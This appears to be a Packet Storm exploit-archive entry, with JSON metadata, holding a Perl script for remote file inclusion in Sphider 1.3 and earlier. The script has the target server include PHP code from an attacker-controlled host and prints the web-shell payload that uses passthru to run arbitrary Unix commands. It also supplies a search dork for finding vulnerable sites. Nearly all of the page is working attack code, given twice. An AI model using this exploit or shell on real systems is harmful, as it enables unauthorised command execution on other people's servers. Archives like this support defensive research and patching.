Search...

sphider_13_xpl_pl.txt

2006-04-14T00:00:00

ID PACKETSTORM:45432
Type packetstorm
Reporter rgod
Modified 2006-04-14T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
use IO::Socket;  
  
print "\r\nSphider &lt;= 1.3 arbitrary remote inclusion\r\n" ;  
print "-&gt; works with register_globals = On & allow_url_fopen = On\r\n";  
print "by rgod rgod&lt;AT&gt;autistici&lt;DOT&gt;org\r\n";  
print "site: http://retrogod.altervista.org\r\n";  
print "\r\ndork: \"powered by sphider\"\r\n";  
  
sub main::urlEncode {  
my ($string) = @_;  
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;  
#$string# =~ tr/.//;  
return $string;  
}  
  
$serv=$ARGV[0];  
$path=$ARGV[1];  
$loc=urlEncode($ARGV[2]);  
$cmd=""; for ($i=3; $i&lt;=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};  
  
if (@ARGV &lt; 4)  
{  
print "\r\nUsage:\r\n";  
print "perl sphider_xpl.pl server path location command\r\n\r\n";  
print "server - Server where sphider is installed.\r\n";  
print "path - Path to sphider (ex: /sphider/ or just /) \r\n";  
print "location - a site with the code to include (without ending slash)\r\n";  
print "command - a Unix command\r\n\r\n";  
print "Example:\r\n";  
print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n";  
print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n";  
print "&lt;?php\r\n";  
print "ob_clean();\r\n";  
print "if (get_magic_quotes_gpc())\r\n";  
print "{\$_GET[\"cmd\"]=stripslashes(\$_GET[\"cmd\"]);}\r\n";  
print "ini_set(\"max_execution_time\",0);\r\n";  
print "echo 56789;\r\n";  
print "passthru(\$_GET[\"cmd\"]);\r\n";  
print "die;\r\n";  
print "?&gt;\r\n";  
exit();  
}  
$sock = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$serv", Timeout =&gt; 10, PeerPort=&gt;"http(80)")  
or die "[+] Connecting ... Could not connect to host.\n\n";  
print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";  
print $sock "Host: ".$serv."\r\n";  
print $sock "Connection: Close\r\n\r\n";  
$out="";  
while ($answer = &lt;$sock&gt;) {  
$out.=$answer;  
}  
close($sock);  
@temp= split /56789/,$out,2;  
if ($#temp&gt;0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}  
#if you are here...  
print "\r\nExploit failed...\r\n";  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:45432", "type": "packetstorm", "bulletinFamily": "exploit", "title": "sphider_13_xpl_pl.txt", "description": "", "published": "2006-04-14T00:00:00", "modified": "2006-04-14T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/45432/sphider_13_xpl_pl.txt.html", "reporter": "rgod", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:23:26", "viewCount": 1, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:23:26", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:26", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/45432/sphider_13_xpl_pl.txt", "sourceData": "`#!/usr/bin/perl \nuse IO::Socket; \n \nprint \"\\r\\nSphider <= 1.3 arbitrary remote inclusion\\r\\n\" ; \nprint \"-> works with register_globals = On & allow_url_fopen = On\\r\\n\"; \nprint \"by rgod rgod<AT>autistici<DOT>org\\r\\n\"; \nprint \"site: http://retrogod.altervista.org\\r\\n\"; \nprint \"\\r\\ndork: \\\"powered by sphider\\\"\\r\\n\"; \n \nsub main::urlEncode { \nmy ($string) = @_; \n$string =~ s/(\\W)/\"%\" . unpack(\"H2\", $1)/ge; \n#$string# =~ tr/.//; \nreturn $string; \n} \n \n$serv=$ARGV[0]; \n$path=$ARGV[1]; \n$loc=urlEncode($ARGV[2]); \n$cmd=\"\"; for ($i=3; $i<=$#ARGV; $i++) {$cmd.=\"%20\".urlEncode($ARGV[$i]);}; \n \nif (@ARGV < 4) \n{ \nprint \"\\r\\nUsage:\\r\\n\"; \nprint \"perl sphider_xpl.pl server path location command\\r\\n\\r\\n\"; \nprint \"server - Server where sphider is installed.\\r\\n\"; \nprint \"path - Path to sphider (ex: /sphider/ or just /) \\r\\n\"; \nprint \"location - a site with the code to include (without ending slash)\\r\\n\"; \nprint \"command - a Unix command\\r\\n\\r\\n\"; \nprint \"Example:\\r\\n\"; \nprint \"perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\\r\\n\\r\\n\"; \nprint \"note: on http location you need this code in /conf.php/index.html :\\r\\n\\r\\n\"; \nprint \"<?php\\r\\n\"; \nprint \"ob_clean();\\r\\n\"; \nprint \"if (get_magic_quotes_gpc())\\r\\n\"; \nprint \"{\\$_GET[\\\"cmd\\\"]=stripslashes(\\$_GET[\\\"cmd\\\"]);}\\r\\n\"; \nprint \"ini_set(\\\"max_execution_time\\\",0);\\r\\n\"; \nprint \"echo 56789;\\r\\n\"; \nprint \"passthru(\\$_GET[\\\"cmd\\\"]);\\r\\n\"; \nprint \"die;\\r\\n\"; \nprint \"?>\\r\\n\"; \nexit(); \n} \n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", Timeout => 10, PeerPort=>\"http(80)\") \nor die \"[+] Connecting ... Could not connect to host.\\n\\n\"; \nprint $sock \"GET \".$path.\"admin/configset.php?cmd=\".$cmd.\"&settings_dir=\".$loc.\" HTTP/1.0\\r\\n\"; \nprint $sock \"Host: \".$serv.\"\\r\\n\"; \nprint $sock \"Connection: Close\\r\\n\\r\\n\"; \n$out=\"\"; \nwhile ($answer = <$sock>) { \n$out.=$answer; \n} \nclose($sock); \n@temp= split /56789/,$out,2; \nif ($#temp>0) {print \"\\r\\nExploit succeeded...\\r\\n\".$temp[1];exit();} \n#if you are here... \nprint \"\\r\\nExploit failed...\\r\\n\"; \n`\n"}